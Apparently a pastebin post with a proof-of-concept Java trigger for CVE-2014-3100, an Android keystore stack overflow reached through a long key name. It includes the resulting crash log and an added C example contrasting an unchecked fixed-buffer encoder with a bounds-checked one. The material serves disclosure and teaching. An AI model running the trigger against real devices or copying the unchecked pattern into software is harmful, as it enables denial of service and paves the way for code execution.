CVE-2014-3100

a guest
Jun 29th, 2014
CVE-2014-3100 POC Java trigger code:

import java.lang.reflect.Method;

// Reach the hidden android.security.KeyStore wrapper through reflection and call
// get() with an oversized key name; the native keystore daemon copies the name
// into a fixed-size stack buffer, which is the overflow this PoC triggers.
Class<?> keystore = Class.forName("android.security.KeyStore");
Method mGetInstance = keystore.getMethod("getInstance");
Method mGet = keystore.getMethod("get", String.class);
Object instance = mGetInstance.invoke(null);
mGet.invoke(instance,
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");

Running this code crashes the KeyStore process. The 0x61616161 ("aaaa") values in eax and ebp and the fault address 0x61616155 show the oversized key name overwriting the stack frame of KeyStore::getKeyForName:

F/libc    ( 2091): Fatal signal 11 (SIGSEGV) at 0x61616155 (code=1), thread 2091 (keystore)
I/DEBUG   (  949): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  949): Build fingerprint: 'generic_x86/sdk_x86/generic_x86:4.3/JSS15J/eng.android-build.20130801.155736:eng/test-keys'
I/DEBUG   (  949): Revision: '0'
I/DEBUG   (  949): pid: 2091, tid: 2091, name: keystore  >>> /system/bin/keystore <<<
I/DEBUG   (  949): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 61616155
I/DEBUG   (  949):     eax 61616161  ebx b7779e94  ecx bff85ed0  edx b777a030
I/DEBUG   (  949):     esi b82a78a0  edi 000003e8
I/DEBUG   (  949):     xcs 00000073  xds 0000007b  xes 0000007b  xfs 00000000  xss 0000007b
I/DEBUG   (  949):     eip b7774937  ebp 61616161  esp bff85d20  flags 00010202
I/DEBUG   (  949):
I/DEBUG   (  949): backtrace:
I/DEBUG   (  949):     #00  pc 0000c937  /system/bin/keystore (KeyStore::getKeyForName(Blob*, android::String8 const&, unsigned int, BlobType)+695)
I/DEBUG   (  949):
I/DEBUG   (  949): stack:
I/DEBUG   (  949):          bff85ce0  00000000
...
I/DEBUG   (  949):          bff85d48  00000007
I/DEBUG   (  949):          bff85d4c  bff85ed0  [stack]
I/DEBUG   (  949):          bff85d50  bff8e1bc  [stack]
I/DEBUG   (  949):          bff85d54  b77765a3  /system/bin/keystore
I/DEBUG   (  949):          bff85d58  b7776419  /system/bin/keystore
I/DEBUG   (  949):          bff85d5c  bff85ed4  [stack]
I/DEBUG   (  949):          ........  ........
I/DEBUG   (  949):
I/DEBUG   (  949): memory map around fault addr 61616155:
I/DEBUG   (  949):     (no map below)
I/DEBUG   (  949):     (no map for address)
I/DEBUG   (  949):     b72ba000-b73b8000 r--  /dev/binder
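The defect class behind this crash, as an added example and not the AOSP keystore source: a hypothetical key-name encoder that expands non-alphanumeric bytes, copies into a fixed-size stack buffer without a bound check (the vulnerable shape), beside a checked form that measures the encoded length first and refuses names that would not fit. NAME_BUF, encoded_len, encode_key_name_unchecked and encode_key_name_checked are all assumed names.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 255  /* hypothetical fixed-size stack buffer for the encoded name */

/* Hypothetical encoding: alphanumerics pass through, any other byte becomes
 * '+' plus two hex digits, so output can be up to 3x the input length.
 * A check on the raw input length alone would therefore be insufficient. */
static size_t encoded_len(const char *name) {
    size_t n = 0;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++)
        n += isalnum(*p) ? 1 : 3;
    return n;
}

/* Vulnerable shape: writes into the caller's fixed buffer with no bound check.
 * Only ever reached here through the checked wrapper below. */
static void encode_key_name_unchecked(const char *name, char out[NAME_BUF]) {
    char *o = out;
    for (const unsigned char *p = (const unsigned char *)name; *p; p++) {
        if (isalnum(*p)) *o++ = (char)*p;
        else o += sprintf(o, "+%02x", *p);
    }
    *o = '\0';
}

/* Hardened form: size the encoded output first, including the terminator,
 * and reject anything that would overrun the buffer. */
static bool encode_key_name_checked(const char *name, char out[NAME_BUF]) {
    if (encoded_len(name) >= NAME_BUF) return false;
    encode_key_name_unchecked(name, out);  /* in bounds by the check above */
    return true;
}

/* Helpers returning results for verification. */
static bool encodes_to(const char *name, const char *expect) {
    char buf[NAME_BUF];
    return encode_key_name_checked(name, buf) && strcmp(buf, expect) == 0;
}

static bool long_name_is_rejected(void) {
    char buf[NAME_BUF];
    char longname[301];  /* constructed: 300 'a' bytes, the shape of the trigger above */
    memset(longname, 'a', 300);
    longname[300] = '\0';
    return !encode_key_name_checked(longname, buf);
}
```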